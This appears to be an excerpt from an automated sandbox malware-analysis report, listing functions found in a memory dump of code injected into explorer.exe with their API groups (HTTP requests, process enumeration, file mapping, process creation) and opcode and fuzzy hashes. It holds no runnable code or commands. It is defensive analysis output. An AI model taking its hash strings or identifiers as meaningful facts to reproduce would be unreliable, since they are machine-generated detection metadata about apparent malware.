                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000009.00000002.3799416128.0000000000F20000.00000040.00000001.00020000.00000000.sdmp, Offset: 00F20000, based on PE: true
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_9_2_f20000_explorer.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Internet$CloseHandle$ConnectHttpOpenRequest
                                                                                                                                                                                                                                                  • String ID: GET
                                                                                                                                                                                                                                                  • API String ID: 830097650-1805413626
                                                                                                                                                                                                                                                  • Opcode ID: 657b085bd4e3b228aebded96fa21e341c1e22246fcb3bdea63752328c3324ad3
                                                                                                                                                                                                                                                  • Instruction ID: 37f2d20ab1985bcaf0a73bb781aaf97a874f0ace70863670efef549685038322
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 657b085bd4e3b228aebded96fa21e341c1e22246fcb3bdea63752328c3324ad3
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2F41D272518A8182E7608B54F45875ABBA0F3C47A8F205126E7CA83E68CFBDC588DF40
                                                                                                                                                                                                                                                  Function 00F22D50 Relevance: 15.2, APIs: 10, Instructions: 232processCOMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000009.00000002.3799416128.0000000000F20000.00000040.00000001.00020000.00000000.sdmp, Offset: 00F20000, based on PE: true
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_9_2_f20000_explorer.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Process32$FirstNext$wsprintf$AllocateCloseCreateHandleMemorySnapshotToolhelp32Virtual
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 3605396869-0
                                                                                                                                                                                                                                                  • Opcode ID: 8df3ec741e24db44c491636e4838e4e767a92c727dd18a58b057ff5a21d5a57b
                                                                                                                                                                                                                                                  • Instruction ID: cda336083abc0994eb0973d69831dd43b42034cfafefe07e86c79dac0d9bf331
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8df3ec741e24db44c491636e4838e4e767a92c727dd18a58b057ff5a21d5a57b
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 87C10872209B9595DA70DB14F89039AB371FBC8794F904126EACE43B69EF3CC649DB40
                                                                                                                                                                                                                                                  Function 00F2BB44 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 102fileCOMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000009.00000002.3799416128.0000000000F20000.00000040.00000001.00020000.00000000.sdmp, Offset: 00F20000, based on PE: true
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_9_2_f20000_explorer.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: File$View$CloseCreateFreeHandleMappingUnmapVirtual
                                                                                                                                                                                                                                                  • String ID: @
                                                                                                                                                                                                                                                  • API String ID: 1610889594-2766056989
                                                                                                                                                                                                                                                  • Opcode ID: ad1cb295e95c51e9872045dcc49814874592f1d56c5c39f8443b6ff2deebca5c
                                                                                                                                                                                                                                                  • Instruction ID: 842bfe32fb9ca9afc7d185807226859728e347cd2b00a5a6778392bc9d816a3a
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ad1cb295e95c51e9872045dcc49814874592f1d56c5c39f8443b6ff2deebca5c
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5041D936219F95C2DB60DB15F89436AB360F7C4BA0F505122EA8E43B69DF3CC544EB40
                                                                                                                                                                                                                                                  Function 00F2C5C0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 65fileCOMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000009.00000002.3799416128.0000000000F20000.00000040.00000001.00020000.00000000.sdmp, Offset: 00F20000, based on PE: true
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_9_2_f20000_explorer.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: File$View$CloseCreateFreeHandleMappingUnmapVirtual
                                                                                                                                                                                                                                                  • String ID: @
                                                                                                                                                                                                                                                  • API String ID: 1610889594-2766056989
                                                                                                                                                                                                                                                  • Opcode ID: 89cc15fca75ace34c048844633d37e36198ece7b99378586f91bb717b3fa10ee
                                                                                                                                                                                                                                                  • Instruction ID: 505272bea723f0c50f53ea09511ce7b26ed5817718bbedee113b21f430e27b2d
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 89cc15fca75ace34c048844633d37e36198ece7b99378586f91bb717b3fa10ee
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 29311C32228E9582D760DB15F89472EB760F7C4BA4F505522EA9F83BA4CF7CC589DB40
                                                                                                                                                                                                                                                  Function 00F2260C Relevance: 7.7, APIs: 5, Instructions: 174processCOMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000009.00000002.3799416128.0000000000F20000.00000040.00000001.00020000.00000000.sdmp, Offset: 00F20000, based on PE: true
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_9_2_f20000_explorer.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Process32wsprintf$CreateFirstNextSnapshotToolhelp32
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 4137211488-0
                                                                                                                                                                                                                                                  • Opcode ID: f7cf74ccca81ea4395c2b22979aaa675c72b38b0cad517df50d9b68bbf6d3949
                                                                                                                                                                                                                                                  • Instruction ID: 2010832bf17e801216b0c666bbbb4a6b5588a56bfbe2fe9dcff1432a93b06d8d
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f7cf74ccca81ea4395c2b22979aaa675c72b38b0cad517df50d9b68bbf6d3949
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: BB81F932619B95E6DA60DB14F88439AB3A5F788790F500126EA8D43B6DEF3CC645EF40
                                                                                                                                                                                                                                                  Function 00F2900C Relevance: 7.6, APIs: 5, Instructions: 121networkCOMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000009.00000002.3799416128.0000000000F20000.00000040.00000001.00020000.00000000.sdmp, Offset: 00F20000, based on PE: true
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_9_2_f20000_explorer.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Internet$CloseHandle$Open
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 2762225225-0
                                                                                                                                                                                                                                                  • Opcode ID: f4ab23ea1251bde643204e4cb4ec55d253b41b4cc402ec1216c39552ba1b096d
                                                                                                                                                                                                                                                  • Instruction ID: 26f8509cf73f90a49b374c25e1604f3422d3f778c7a3d2e210d7691b73db344f
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f4ab23ea1251bde643204e4cb4ec55d253b41b4cc402ec1216c39552ba1b096d
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8751F132618A9586DB60CB59F49475AB7A0F3C57A4F50102AFB8A83B68CFBDC844DB00
                                                                                                                                                                                                                                                  Function 00F2B9A0 Relevance: 7.6, APIs: 5, Instructions: 79processCOMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000009.00000002.3799416128.0000000000F20000.00000040.00000001.00020000.00000000.sdmp, Offset: 00F20000, based on PE: true
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_9_2_f20000_explorer.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: CloseHandlewsprintf$CreateProcess
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 2803068115-0
                                                                                                                                                                                                                                                  • Opcode ID: e34008a14b46bdf237dcb82eb44399d81f95163e5711bd1a836f86fc25367b22
                                                                                                                                                                                                                                                  • Instruction ID: 242a78d55af320ca2ab0e61bd4bd76c48e13ab3910d2a3a26af771989b0e3e8b
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e34008a14b46bdf237dcb82eb44399d81f95163e5711bd1a836f86fc25367b22
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 36410672219B86D6DB60DF10F4943ABB7A0F7C8394F404026EAC982A69EF7CC559DF40